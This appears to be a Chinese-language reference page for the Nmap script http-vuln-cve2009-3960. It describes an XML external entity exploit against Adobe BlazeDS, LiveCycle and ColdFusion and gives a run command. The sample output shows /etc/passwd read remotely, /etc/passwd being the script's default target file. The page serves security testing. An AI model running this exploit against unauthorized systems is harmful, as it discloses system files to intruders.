http-vuln-cve2009-3960
脚本使用类型:
portrule
脚本所属分类:
exploit, intrusive
脚本下载地址: http://nmap.org/svn/scripts/http-vuln-cve2009-3960.nse
Exploits cve-2009-3960 also known as Adobe XML External Entity Injection.
This vulnerability permits to read local files remotely and is present in BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0
For more information see:
Points to the root path. Defaults to "/"
target file to be read. Defaults to "/etc/passwd"
执行格式
nmap --script=http-vuln-cve2009-3960 --script-args http-http-vuln-cve2009-3960.root="/root/" <target>
PORT STATE SERVICE 80/tcp open http | http-vuln-cve2009-3960: | samples/messagebroker/http | <?xml version="1.0" encoding="utf-8"?> | <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash | bin:*:1:1:bin:/bin:/sbin/nologin | daemon:*:2:2:daemon:/sbin:/sbin/nologin | adm:*:3:4:adm:/var/adm:/sbin/nologin | lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin | sync:*:5:0:sync:/sbin:/bin/sync | shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown | halt:*:7:0:halt:/sbin:/sbin/halt | mail:*:8:12:mail:/var/spool/mail:/sbin/nologin | news:*:9:13:news:/etc/news: | uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin | operator:*:11:0:operator:/root:/sbin/nologin | games:*:12:100:games:/usr/games:/sbin/nologin | gopher:*:13:30:gopher:/var/gopher:/sbin/nologin | ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin | nobody:*:99:99:Nobody:/:/sbin/nologin | nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin | vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin | pcap:!!:77:77::/var/arpwatch:/sbin/nologin | mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin | ... |_
Author: Hani Benhabiles
License: VER007 整理 http://www.ver007.com